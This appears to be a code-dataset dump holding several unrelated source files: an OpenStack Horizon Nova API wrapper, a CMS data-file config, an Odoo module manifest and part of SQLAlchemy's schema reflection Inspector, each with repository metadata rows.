self.id = key
self.key = key
self.value = val
class FloatingIp(base.APIResourceWrapper):
_attrs = ['id', 'ip', 'fixed_ip', 'port_id', 'instance_id',
'instance_type', 'pool']
def __init__(self, fip):
fip.__setattr__('port_id', fip.instance_id)
fip.__setattr__('instance_type',
'compute' if fip.instance_id else None)
super(FloatingIp, self).__init__(fip)
class FloatingIpPool(base.APIDictWrapper):
def __init__(self, pool):
pool_dict = {'id': pool.name,
'name': pool.name}
super(FloatingIpPool, self).__init__(pool_dict)
class FloatingIpTarget(base.APIDictWrapper):
def __init__(self, server):
server_dict = {'name': '%s (%s)' % (server.name, server.id),
'id': server.id}
super(FloatingIpTarget, self).__init__(server_dict)
class FloatingIpManager(network_base.FloatingIpManager):
def __init__(self, request):
self.request = request
self.client = novaclient(request)
def list_pools(self):
return [FloatingIpPool(pool)
for pool in self.client.floating_ip_pools.list()]
def list(self):
return [FloatingIp(fip)
for fip in self.client.floating_ips.list()]
def get(self, floating_ip_id):
return FloatingIp(self.client.floating_ips.get(floating_ip_id))
def allocate(self, pool):
return FloatingIp(self.client.floating_ips.create(pool=pool))
def release(self, floating_ip_id):
self.client.floating_ips.delete(floating_ip_id)
def associate(self, floating_ip_id, port_id):
# In Nova implied port_id is instance_id
server = self.client.servers.get(port_id)
fip = self.client.floating_ips.get(floating_ip_id)
self.client.servers.add_floating_ip(server.id, fip.ip)
def disassociate(self, floating_ip_id):
fip = self.client.floating_ips.get(floating_ip_id)
server = self.client.servers.get(fip.instance_id)
self.client.servers.remove_floating_ip(server.id, fip.ip)
def list_targets(self):
return [FloatingIpTarget(s) for s in self.client.servers.list()]
def get_target_id_by_instance(self, instance_id, target_list=None):
return instance_id
def list_target_id_by_instance(self, instance_id, target_list=None):
return [instance_id, ]
def is_simple_associate_supported(self):
return conf.HORIZON_CONFIG["simple_ip_management"]
def is_supported(self):
return True
@memoized
def policy_list(request):
return novaclient(request).policys.list()
@memoized
def novaclient(request):
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
c = nova_client.Client(VERSIONS.get_active_version()['version'],
request.user.username,
request.user.token.id,
project_id=request.user.tenant_id,
auth_url=base.url_for(request, 'compute'),
insecure=insecure,
cacert=cacert,
http_log_debug=settings.DEBUG)
c.client.auth_token = request.user.token.id
c.client.management_url = base.url_for(request, 'compute')
return c
def server_vnc_console(request, instance_id, console_type='novnc'):
return VNCConsole(novaclient(request).servers.get_vnc_console(
instance_id, console_type)['console'])
def server_spice_console(request, instance_id, console_type='spice-html5'):
return SPICEConsole(novaclient(request).servers.get_spice_console(
instance_id, console_type)['console'])
def server_rdp_console(request, instance_id, console_type='rdp-html5'):
return RDPConsole(novaclient(request).servers.get_rdp_console(
instance_id, console_type)['console'])
def server_serial_console(request, instance_id, console_type='serial'):
return SerialConsole(novaclient(request).servers.get_serial_console(
instance_id, console_type)['console'])
def flavor_create(request, name, memory, vcpu, disk, cache=0,flavorid='auto',
ephemeral=0, swap=0, metadata=None, is_public=True,
rxtx_factor=1):
flavor = novaclient(request).flavors.create(name, memory, vcpu, disk,cache,
flavorid=flavorid,
ephemeral=ephemeral,
swap=swap, is_public=is_public,
rxtx_factor=rxtx_factor)
if (metadata):
flavor_extra_set(request, flavor.id, metadata)
return flavor
def flavor_delete(request, flavor_id):
novaclient(request).flavors.delete(flavor_id)
def flavor_get(request, flavor_id, get_extras=False):
flavor = novaclient(request).flavors.get(flavor_id)
if get_extras:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return flavor
@memoized
def flavor_list(request, is_public=True, get_extras=False):
"""Get the list of available instance sizes (flavors)."""
flavors = novaclient(request).flavors.list(is_public=is_public)
if get_extras:
for flavor in flavors:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return flavors
def update_pagination(entities, page_size, marker, sort_dir, sort_key,
reversed_order):
has_more_data = has_prev_data = False
if len(entities) > page_size:
has_more_data = True
entities.pop()
if marker is not None:
has_prev_data = True
# first page condition when reached via prev back
elif reversed_order and marker is not None:
has_more_data = True
# last page condition
elif marker is not None:
has_prev_data = True
# restore the original ordering here
if reversed_order:
entities = sorted(entities, key=lambda entity:
(getattr(entity, sort_key) or '').lower(),
reverse=(sort_dir == 'asc'))
return entities, has_more_data, has_prev_data
@memoized
def flavor_list_paged(request, is_public=True, get_extras=False, marker=None,
paginate=False, sort_key="name", sort_dir="desc",
reversed_order=False):
"""Get the list of available instance sizes (flavors)."""
has_more_data = False
has_prev_data = False
if paginate:
if reversed_order:
sort_dir = 'desc' if sort_dir == 'asc' else 'asc'
page_size = utils.get_page_size(request)
flavors = novaclient(request).flavors.list(is_public=is_public,
marker=marker,
limit=page_size + 1,
sort_key=sort_key,
sort_dir=sort_dir)
flavors, has_more_data, has_prev_data = update_pagination(
flavors, page_size, marker, sort_dir, sort_key, reversed_order)
else:
flavors = novaclient(request).flavors.list(is_public=is_public)
if get_extras:
for flavor in flavors:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return (flavors, has_more_data, has_prev_data)
@memoized
def flavor_access_list(request, flavor=None):
"""Get the list of access instance sizes (flavors)."""
return novaclient(request).flavor_access.list(flavor=flavor)
def add_tenant_to_flavor(request, flavor, tenant):
"""Add a tenant to the given flavor access list."""
return novaclient(request).flavor_access.add_tenant_access(
flavor=flavor, tenant=tenant)
def remove_tenant_from_flavor(request, flavor, tenant):
"""Remove a tenant from the given flavor access list."""
return novaclient(request).flavor_access.remove_tenant_access(
flavor=flavor, tenant=tenant)
def flavor_get_extras(request, flavor_id, raw=False, flavor=None):
"""Get flavor extra specs."""
if flavor is None:
flavor = novaclient(request).flavors.get(flavor_id)
extras = flavor.get_keys()
if raw:
return extras
return [FlavorExtraSpec(flavor_id, key, value) for
key, value in extras.items()]
def flavor_extra_delete(request, flavor_id, keys):
"""Unset the flavor extra spec keys."""
flavor = novaclient(request).flavors.get(flavor_id)
return flavor.unset_keys(keys)
def flavor_extra_set(request, flavor_id, metadata):
"""Set the flavor extra spec keys."""
flavor = novaclient(request).flavors.get(flavor_id)
if (not metadata): # not a way to delete keys
return None
return flavor.set_keys(metadata)
def snapshot_create(request, instance_id, name):
return novaclient(request).servers.create_image(instance_id, name)
def keypair_create(request, name):
return novaclient(request).keypairs.create(name)
def keypair_import(request, name, public_key):
return novaclient(request).keypairs.create(name, public_key)
def keypair_delete(request, keypair_id):
novaclient(request).keypairs.delete(keypair_id)
def keypair_list(request):
return novaclient(request).keypairs.list()
def keypair_get(request, keypair_id):
return novaclient(request).keypairs.get(keypair_id)
def server_create(request, name, image, flavor, key_name, user_data,
security_groups, block_device_mapping=None,
block_device_mapping_v2=None, nics=None,
availability_zone=None, instance_count=1, admin_pass=None,
disk_config=None, config_drive=None, meta=None):
return Server(novaclient(request).servers.create(
name, image, flavor, userdata=user_data,
security_groups=security_groups,
key_name=key_name, block_device_mapping=block_device_mapping,
block_device_mapping_v2=block_device_mapping_v2,
nics=nics, availability_zone=availability_zone,
min_count=instance_count, admin_pass=admin_pass,
disk_config=disk_config, config_drive=config_drive,
meta=meta), request)
def server_delete(request, instance):
novaclient(request).servers.delete(instance)
def server_get(request, instance_id):
return Server(novaclient(request).servers.get(instance_id), request)
def server_list(request, search_opts=None, all_tenants=False):
page_size = utils.get_page_size(request)
c = novaclient(request)
paginate = False
if search_opts is None:
search_opts = {}
elif 'paginate' in search_opts:
paginate = search_opts.pop('paginate')
if paginate:
search_opts['limit'] = page_size + 1
if all_tenants:
search_opts['all_tenants'] = True
else:
search_opts['project_id'] = request.user.tenant_id
servers = [Server(s, request)
for s in c.servers.list(True, search_opts)]
has_more_data = False
if paginate and len(servers) > page_size:
servers.pop(-1)
has_more_data = True
elif paginate and len(servers) == getattr(settings, 'API_RESULT_LIMIT',
1000):
has_more_data = True
return (servers, has_more_data)
def server_console_output(request, instance_id, tail_length=None):
"""Gets console output of an instance."""
return novaclient(request).servers.get_console_output(instance_id,
length=tail_length)
def server_pause(request, instance_id):
novaclient(request).servers.pause(instance_id)
def server_unpause(request, instance_id):
novaclient(request).servers.unpause(instance_id)
def server_suspend(request, instance_id):
novaclient(request).servers.suspend(instance_id)
def server_resume(request, instance_id):
novaclient(request).servers.resume(instance_id)
def server_shelve(request, instance_id):
novaclient(request).servers.shelve(instance_id)
def server_unshelve(request, instance_id):
novaclient(request).servers.unshelve(instance_id)
def server_reboot(request, instance_id, soft_reboot=False):
hardness = nova_servers.REBOOT_HARD
if soft_reboot:
hardness = nova_servers.REBOOT_SOFT
novaclient(request).servers.reboot(instance_id, hardness)
def server_rebuild(request, instance_id, image_id, password=None,
disk_config=None):
return novaclient(request).servers.rebuild(instance_id, image_id,
password, disk_config)
def server_update(request, instance_id, name):
return novaclient(request).servers.update(instance_id, name=name)
def server_migrate(request, instance_id):
novaclient(request).servers.migrate(instance_id)
def server_live_migrate(request, instance_id, host, block_migration=False,
disk_over_commit=False):
novaclient(request).servers.live_migrate(instance_id, host,
block_migration,
disk_over_commit)
def server_resize(request, instance_id, flavor, disk_config=None, **kwargs):
novaclient(request).servers.resize(instance_id, flavor,
disk_config, **kwargs)
def server_confirm_resize(request, instance_id):
novaclient(request).servers.confirm_resize(instance_id)
def server_revert_resize(request, instance_id):
novaclient(request).servers.revert_resize(instance_id)
def server_start(request, instance_id):
novaclient(request).servers.start(instance_id)
def server_stop(request, instance_id):
novaclient(request).servers.stop(instance_id)
def server_lock(request, instance_id):
novaclient(request).servers.lock(instance_id)
def server_unlock(request, instance_id):
novaclient(request).servers.unlock(instance_id)
def server_metadata_update(request, instance_id, metadata):
novaclient(request).servers.set_meta(instance_id, metadata)
def server_metadata_delete(request, instance_id, keys):
novaclient(request).servers.delete_meta(instance_id, keys)
def tenant_quota_get(request, tenant_id):
return base.QuotaSet(novaclient(request).quotas.get(tenant_id))
def tenant_quota_update(request, tenant_id, **kwargs):
novaclient(request).quotas.update(tenant_id, **kwargs)
def default_quota_get(request, tenant_id):
return base.QuotaSet(novaclient(request).quotas.defaults(tenant_id))
def default_quota_update(request, **kwargs):
novaclient(request).quota_classes.update(DEFAULT_QUOTA_NAME, **kwargs)
def usage_get(request, tenant_id, start, end):
return NovaUsage(novaclient(request).usage.get(tenant_id, start, end))
def usage_list(request, start, end):
return [NovaUsage(u) for u in
novaclient(request).usage.list(start, end, True)]
def virtual_interfaces_list(request, instance_id):
return novaclient(request).virtual_interfaces.list(instance_id)
def get_x509_credentials(request):
return novaclient(request).certs.create()
def get_x509_root_certificate(request):
return novaclient(request).certs.get()
def get_password(request, instance_id, private_key=None):
return novaclient(request).servers.get_password(instance_id, private_key)
def instance_volume_attach(request, volume_id, instance_id, device):
return novaclient(request).volumes.create_server_volume(instance_id,
volume_id,
device)
def instance_volume_detach(request, instance_id, att_id):
return novaclient(request).volumes.delete_server_volume(instance_id,
att_id)
def instance_volumes_list(request, instance_id):
from openstack_dashboard.api import cinder
volumes = novaclient(request).volumes.get_server_volumes(instance_id)
for volume in volumes:
volume_data = cinder.cinderclient(request).volumes.get(volume.id)
volume.name = cinder.Volume(volume_data).name
return volumes
def hypervisor_list(request):
return novaclient(request).hypervisors.list()
def hypervisor_stats(request):
return novaclient(request).hypervisors.statistics()
def hypervisor_search(request, query, servers=True):
return novaclient(request).hypervisors.search(query, servers)
def evacuate_host(request, host, target=None, on_shared_storage=False):
# TODO(jmolle) This should be change for nova atomic api host_evacuate
hypervisors = novaclient(request).hypervisors.search(host, True)
response = []
err_code = None
for hypervisor in hypervisors:
hyper = Hypervisor(hypervisor)
# if hypervisor doesn't have servers, the attribute is not present
for server in hyper.servers:
try:
novaclient(request).servers.evacuate(server['uuid'],
target,
on_shared_storage)
except nova_exceptions.ClientException as err:
err_code = err.code
msg = _("Name: %(name)s ID: %(uuid)s")
msg = msg % {'name': server['name'], 'uuid': server['uuid']}
response.append(msg)
if err_code:
msg = _('Failed to evacuate instances: %s') % ', '.join(response)
raise nova_exceptions.ClientException(err_code, msg)
return True
def migrate_host(request, host, live_migrate=False, disk_over_commit=False,
block_migration=False):
hypervisors = novaclient(request).hypervisors.search(host, True)
response = []
err_code = None
for hyper in hypervisors:
for server in getattr(hyper, "servers", []):
try:
if live_migrate:
instance = server_get(request, server['uuid'])
# Checking that instance can be live-migrated
if instance.status in ["ACTIVE", "PAUSED"]:
novaclient(request).servers.live_migrate(
server['uuid'],
None,
block_migration,
disk_over_commit
)
else:
novaclient(request).servers.migrate(server['uuid'])
else:
novaclient(request).servers.migrate(server['uuid'])
except nova_exceptions.ClientException as err:
err_code = err.code
msg = _("Name: %(name)s ID: %(uuid)s")
msg = msg % {'name': server['name'], 'uuid': server['uuid']}
response.append(msg)
if err_code:
msg = _('Failed to migrate instances: %s') % ', '.join(response)
raise nova_exceptions.ClientException(err_code, msg)
return True
def tenant_absolute_limits(request, reserved=False):
limits = novaclient(request).limits.get(reserved=reserved).absolute
limits_dict = {}
for limit in limits:
if limit.value < 0:
# Workaround for nova bug 1370867 that absolute_limits
# returns negative value for total.*Used instead of 0.
# For such case, replace negative values with 0.
if limit.name.startswith('total') and limit.name.endswith('Used'):
limits_dict[limit.name] = 0
else:
# -1 is used to represent unlimited quotas
limits_dict[limit.name] = float("inf")
else:
limits_dict[limit.name] = limit.value
return limits_dict
def availability_zone_list(request, detailed=False):
return novaclient(request).availability_zones.list(detailed=detailed)
def service_list(request, binary=None):
return novaclient(request).services.list(binary=binary)
def service_enable(request, host, binary):
return novaclient(request).services.enable(host, binary)
def service_disable(request, host, binary, reason=None):
if reason:
return novaclient(request).services.disable_log_reason(host,
binary, reason)
else:
return novaclient(request).services.disable(host, binary)
def aggregate_details_list(request):
result = []
c = novaclient(request)
for aggregate in c.aggregates.list():
result.append(c.aggregates.get_details(aggregate.id))
return result
def aggregate_create(request, name, availability_zone=None):
return novaclient(request).aggregates.create(name, availability_zone)
def aggregate_delete(request, aggregate_id):
return novaclient(request).aggregates.delete(aggregate_id)
def aggregate_get(request, aggregate_id):
return novaclient(request).aggregates.get(aggregate_id)
def aggregate_update(request, aggregate_id, values):
return novaclient(request).aggregates.update(aggregate_id, values)
def aggregate_set_metadata(request, aggregate_id, metadata):
return novaclient(request).aggregates.set_metadata(aggregate_id, metadata)
def host_list(request):
return novaclient(request).hosts.list()
def add_host_to_aggregate(request, aggregate_id, host):
return novaclient(request).aggregates.add_host(aggregate_id, host)
def remove_host_from_aggregate(request, aggregate_id, host):
return novaclient(request).aggregates.remove_host(aggregate_id, host)
def interface_attach(request,
server, port_id=None, net_id=None, fixed_ip=None):
return novaclient(request).servers.interface_attach(server,
port_id,
net_id,
fixed_ip)
def interface_detach(request, server, port_id):
return novaclient(request).servers.interface_detach(server, port_id)
@memoized
def list_extensions(request):
"""List all nova extensions, except the ones in the blacklist."""
blacklist = set(getattr(settings,
'OPENSTACK_NOVA_EXTENSIONS_BLACKLIST', []))
return [
extension for extension in
nova_list_extensions.ListExtManager(novaclient(request)).show_all()
if extension.name not in blacklist
]
@memoized
def extension_supported(extension_name, request):
"""Determine if nova supports a given extension name.
Example values for the extension_name include AdminActions, ConsoleOutput,
etc.
"""
extensions = list_extensions(request)
for extension in extensions:
if extension.name == extension_name:
return True
return False
def can_set_server_password():
features = getattr(settings, 'OPENSTACK_HYPERVISOR_FEATURES', {})
return features.get('can_set_password', False)
def instance_action_list(request, instance_id):
return nova_instance_action.InstanceActionManager(
novaclient(request)).list(instance_id)
def can_set_mount_point():
"""Return the Hypervisor's capability of setting mount points."""
hypervisor_features = getattr(
settings, "OPENSTACK_HYPERVISOR_FEATURES", {})
return hypervisor_features.get("can_set_mount_point", False)
def requires_keypair():
features = getattr(settings, 'OPENSTACK_HYPERVISOR_FEATURES', {})
return features.get('requires_keypair', False)
| [
"[email protected]"
] | |
3a390a443f62dda7aaf9ce5b667f5dfe9dd4c376 | 9b39e32f36e4f949d617e158c5034faa9595aaf0 | /python/PHYS14/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8_cff.py | e21dd683067ea39f4ddd04af1141721dd2490d0b | [] | no_license | awhitbeck/SuSySubstructure | c24043227697f74bb85edc1cb84d65b884a141d5 | 1422a1f6e46468fdd103f92ccbdffc34468cbbd9 | refs/heads/synch_June26_2015 | 2021-01-19T07:43:59.339373 | 2015-08-16T09:35:49 | 2015-08-16T09:35:49 | 14,053,341 | 0 | 2 | null | 2015-08-08T08:24:37 | 2013-11-01T20:44:04 | Python | UTF-8 | Python | false | false | 1,133 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/7C6B4D11-AC7C-E411-8A5F-002590D0B0D8.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/C8C83950-C37C-E411-90F6-20CF305B0572.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/D89A3C72-C67C-E411-9BCF-00248C9BA537.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/20000/085FCE99-877C-E411-900C-20CF3027A577.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/20000/2A6589BB-A07C-E411-A137-00259074AE7A.root' ] );
secFiles.extend( [
] )
| [
"[email protected]"
] | |
80323aa0c33ac672897ee319b3f16f71e768fb5c | da47e42519b6d5eb37bdb634fd618672706e79da | /localizacion_metromed/tys_http/__manifest__.py | 5094cf573f3be281a9e1d379e90f33313dc7ee0c | [] | no_license | Tysamncaweb/produccion2 | 02bbbccefc4f4cd0d0948b1b0552d931f804fb9b | b95909d0689fc787185290565f0873040a6027cf | refs/heads/master | 2022-04-26T13:51:22.316294 | 2020-04-29T19:58:35 | 2020-04-29T19:58:35 | 260,013,639 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | # -*- coding: utf-8 -*-
{
'name': "submodules/tys_http",
'summary': """
Short (1 phrase/line) summary of the module's purpose, used as
subtitle on modules listing or apps.openerp.com""",
'description': """
Long description of module's purpose
""",
'author': "My Company",
'website': "http://www.yourcompany.com",
# Categories can be used to filter modules in modules listing
# Check https://github.com/odoo/odoo/blob/master/odoo/addons/base/module/module_data.xml
# for the full list
'category': 'Uncategorized',
'version': '0.1',
# any module necessary for this one to work correctly
'depends': ['base'],
# always loaded
'data': [
# 'security/ir.model.access.csv',
'views/views.xml',
'views/templates.xml',
],
# only loaded in demonstration mode
'demo': [
'demo/demo.xml',
],
} | [
"[email protected]"
] | |
495b2ec1563ff083c161ceed00c7cb888178ead0 | fbbaf3f4cf87d75e87c992f62f40dc198fb7b5a8 | /libs/sqlalchemy-rel_0_7/lib/sqlalchemy/engine/reflection.py | 76cb5bdaa4328f1096ba3b737ba8bc4d3d374d4c | [
"MIT"
] | permissive | sonikandpikachu/wcomp | cfe30371beb518fda9af890434a089673226df32 | b0c445bf3e2fec636eb4b5cb01ae1e2fc06ed29a | refs/heads/master | 2021-01-18T16:47:50.918828 | 2012-10-05T15:27:37 | 2012-10-05T15:27:37 | 3,497,017 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,090 | py | # engine/reflection.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provides an abstraction for obtaining database schema information.
Usage Notes:
Here are some general conventions when accessing the low level inspector
methods such as get_table_names, get_columns, etc.
1. Inspector methods return lists of dicts in most cases for the following
reasons:
* They're both standard types that can be serialized.
* Using a dict instead of a tuple allows easy expansion of attributes.
* Using a list for the outer structure maintains order and is easy to work
with (e.g. list comprehension [d['name'] for d in cols]).
2. Records that contain a name, such as the column name in a column record
use the key 'name'. So for most return values, each record will have a
'name' attribute..
"""
import sqlalchemy
from sqlalchemy import exc, sql
from sqlalchemy import util
from sqlalchemy.util import topological
from sqlalchemy.types import TypeEngine
from sqlalchemy import schema as sa_schema
@util.decorator
def cache(fn, self, con, *args, **kw):
info_cache = kw.get('info_cache', None)
if info_cache is None:
return fn(self, con, *args, **kw)
key = (
fn.__name__,
tuple(a for a in args if isinstance(a, basestring)),
tuple((k, v) for k, v in kw.iteritems() if isinstance(v, (basestring, int, float)))
)
ret = info_cache.get(key)
if ret is None:
ret = fn(self, con, *args, **kw)
info_cache[key] = ret
return ret
class Inspector(object):
"""Performs database schema inspection.
The Inspector acts as a proxy to the reflection methods of the
:class:`~sqlalchemy.engine.base.Dialect`, providing a
consistent interface as well as caching support for previously
fetched metadata.
The preferred method to construct an :class:`.Inspector` is via the
:meth:`Inspector.from_engine` method. I.e.::
engine = create_engine('...')
insp = Inspector.from_engine(engine)
Where above, the :class:`~sqlalchemy.engine.base.Dialect` may opt
to return an :class:`.Inspector` subclass that provides additional
methods specific to the dialect's target database.
"""
def __init__(self, bind):
"""Initialize a new :class:`.Inspector`.
:param bind: a :class:`~sqlalchemy.engine.base.Connectable`,
which is typically an instance of
:class:`~sqlalchemy.engine.base.Engine` or
:class:`~sqlalchemy.engine.base.Connection`.
For a dialect-specific instance of :class:`.Inspector`, see
:meth:`Inspector.from_engine`
"""
# this might not be a connection, it could be an engine.
self.bind = bind
# set the engine
if hasattr(bind, 'engine'):
self.engine = bind.engine
else:
self.engine = bind
if self.engine is bind:
# if engine, ensure initialized
bind.connect().close()
self.dialect = self.engine.dialect
self.info_cache = {}
@classmethod
def from_engine(cls, bind):
"""Construct a new dialect-specific Inspector object from the given engine or connection.
:param bind: a :class:`~sqlalchemy.engine.base.Connectable`,
which is typically an instance of
:class:`~sqlalchemy.engine.base.Engine` or
:class:`~sqlalchemy.engine.base.Connection`.
This method differs from direct a direct constructor call of :class:`.Inspector`
in that the :class:`~sqlalchemy.engine.base.Dialect` is given a chance to provide
a dialect-specific :class:`.Inspector` instance, which may provide additional
methods.
See the example at :class:`.Inspector`.
"""
if hasattr(bind.dialect, 'inspector'):
return bind.dialect.inspector(bind)
return Inspector(bind)
@property
def default_schema_name(self):
"""Return the default schema name presented by the dialect
for the current engine's database user.
E.g. this is typically ``public`` for Postgresql and ``dbo``
for SQL Server.
"""
return self.dialect.default_schema_name
def get_schema_names(self):
"""Return all schema names.
"""
if hasattr(self.dialect, 'get_schema_names'):
return self.dialect.get_schema_names(self.bind,
info_cache=self.info_cache)
return []
def get_table_names(self, schema=None, order_by=None):
"""Return all table names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
:param order_by: Optional, may be the string "foreign_key" to sort
the result on foreign key dependencies.
This should probably not return view names or maybe it should return
them with an indicator t or v.
"""
if hasattr(self.dialect, 'get_table_names'):
tnames = self.dialect.get_table_names(self.bind,
schema, info_cache=self.info_cache)
else:
tnames = self.engine.table_names(schema)
if order_by == 'foreign_key':
import random
random.shuffle(tnames)
tuples = []
for tname in tnames:
for fkey in self.get_foreign_keys(tname, schema):
if tname != fkey['referred_table']:
tuples.append((tname, fkey['referred_table']))
tnames = list(topological.sort(tuples, tnames))
return tnames
def get_table_options(self, table_name, schema=None, **kw):
"""Return a dictionary of options specified when the table of the given name was created.
This currently includes some options that apply to MySQL tables.
"""
if hasattr(self.dialect, 'get_table_options'):
return self.dialect.get_table_options(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return {}
def get_view_names(self, schema=None):
"""Return all view names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_names(self.bind, schema,
info_cache=self.info_cache)
def get_view_definition(self, view_name, schema=None):
"""Return definition for `view_name`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_definition(
self.bind, view_name, schema, info_cache=self.info_cache)
def get_columns(self, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a string `table_name` and an optional string `schema`, return
column information as a list of dicts with these keys:
name
the column's name
type
:class:`~sqlalchemy.types.TypeEngine`
nullable
boolean
default
the column's default value
attrs
dict containing optional column attributes
"""
col_defs = self.dialect.get_columns(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
for col_def in col_defs:
# make this easy and only return instances for coltype
coltype = col_def['type']
if not isinstance(coltype, TypeEngine):
col_def['type'] = coltype()
return col_defs
def get_primary_keys(self, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a list of column names.
"""
pkeys = self.dialect.get_primary_keys(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_pk_constraint(self, table_name, schema=None, **kw):
"""Return information about primary key constraint on `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a dictionary with these keys:
constrained_columns
a list of column names that make up the primary key
name
optional name of the primary key constraint.
"""
pkeys = self.dialect.get_pk_constraint(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_foreign_keys(self, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
foreign key information as a list of dicts with these keys:
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
name
optional name of the foreign key constraint.
\**kw
other options passed to the dialect's get_foreign_keys() method.
"""
fk_defs = self.dialect.get_foreign_keys(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return fk_defs
def get_indexes(self, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a string `table_name` and an optional string `schema`, return
index information as a list of dicts with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
\**kw
other options passed to the dialect's get_indexes() method.
"""
indexes = self.dialect.get_indexes(self.bind, table_name,
schema,
info_cache=self.info_cache, **kw)
return indexes
def reflecttable(self, table, include_columns, exclude_columns=()):
"""Given a Table object, load its internal constructs based on introspection.
This is the underlying method used by most dialects to produce
table reflection. Direct usage is like::
from sqlalchemy import create_engine, MetaData, Table
from sqlalchemy.engine import reflection
engine = create_engine('...')
meta = MetaData()
user_table = Table('user', meta)
insp = Inspector.from_engine(engine)
insp.reflecttable(user_table, None)
:param table: a :class:`~sqlalchemy.schema.Table` instance.
:param include_columns: a list of string column names to include
in the reflection process. If ``None``, all columns are reflected.
"""
dialect = self.bind.dialect
# table attributes we might need.
reflection_options = dict(
(k, table.kwargs.get(k)) for k in dialect.reflection_options if k in table.kwargs)
schema = table.schema
table_name = table.name
# apply table options
tbl_opts = self.get_table_options(table_name, schema, **table.kwargs)
if tbl_opts:
table.kwargs.update(tbl_opts)
# table.kwargs will need to be passed to each reflection method. Make
# sure keywords are strings.
tblkw = table.kwargs.copy()
for (k, v) in tblkw.items():
del tblkw[k]
tblkw[str(k)] = v
# Py2K
if isinstance(schema, str):
schema = schema.decode(dialect.encoding)
if isinstance(table_name, str):
table_name = table_name.decode(dialect.encoding)
# end Py2K
# columns
found_table = False
for col_d in self.get_columns(table_name, schema, **tblkw):
found_table = True
table.dispatch.column_reflect(table, col_d)
name = col_d['name']
if include_columns and name not in include_columns:
continue
if exclude_columns and name in exclude_columns:
continue
coltype = col_d['type']
col_kw = {
'nullable':col_d['nullable'],
}
for k in ('autoincrement', 'quote', 'info', 'key'):
if k in col_d:
col_kw[k] = col_d[k]
colargs = []
if col_d.get('default') is not None:
# the "default" value is assumed to be a literal SQL expression,
# so is wrapped in text() so that no quoting occurs on re-issuance.
colargs.append(
sa_schema.DefaultClause(
sql.text(col_d['default']), _reflected=True
)
)
if 'sequence' in col_d:
# TODO: mssql, maxdb and sybase are using this.
seq = col_d['sequence']
sequence = sa_schema.Sequence(seq['name'], 1, 1)
if 'start' in seq:
sequence.start = seq['start']
if 'increment' in seq:
sequence.increment = seq['increment']
colargs.append(sequence)
col = sa_schema.Column(name, coltype, *colargs, **col_kw)
table.append_column(col)
if not found_table:
raise exc.NoSuchTableError(table.name)
# Primary keys
pk_cons = self.get_pk_constraint(table_name, schema, **tblkw)
if pk_cons:
pk_cols = [table.c[pk]
for pk in pk_cons['constrained_columns']
if pk in table.c and pk not in exclude_columns
] + [pk for pk in table.primary_key if pk.key in exclude_columns]
primary_key_constraint = sa_schema.PrimaryKeyConstraint(name=pk_cons.get('name'),
*pk_cols
)
table.append_constraint(primary_key_constraint)
# Foreign keys
fkeys = self.get_foreign_keys(table_name, schema, **tblkw)
for fkey_d in fkeys:
conname = fkey_d['name']
constrained_columns = fkey_d['constrained_columns']
referred_schema = fkey_d['referred_schema']
referred_table = fkey_d['referred_table']
referred_columns = fkey_d['referred_columns']
refspec = []
if referred_schema is not None:
sa_schema.Table(referred_table, table.metadata,
autoload=True, schema=referred_schema,
autoload_with=self.bind,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join(
[referred_schema, referred_table, column]))
else:
sa_schema.Table(referred_table, table.metadata, autoload=True,
autoload_with=self.bind,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join([referred_table, column]))
table.append_constraint(
sa_schema.ForeignKeyConstraint(constrained_columns, refspec,
conname, link_to_name=True))
# Indexes
indexes = self.get_indexes(table_name, schema)
for index_d in indexes:
name = index_d['name']
columns = index_d['column_names']
unique = index_d['unique']
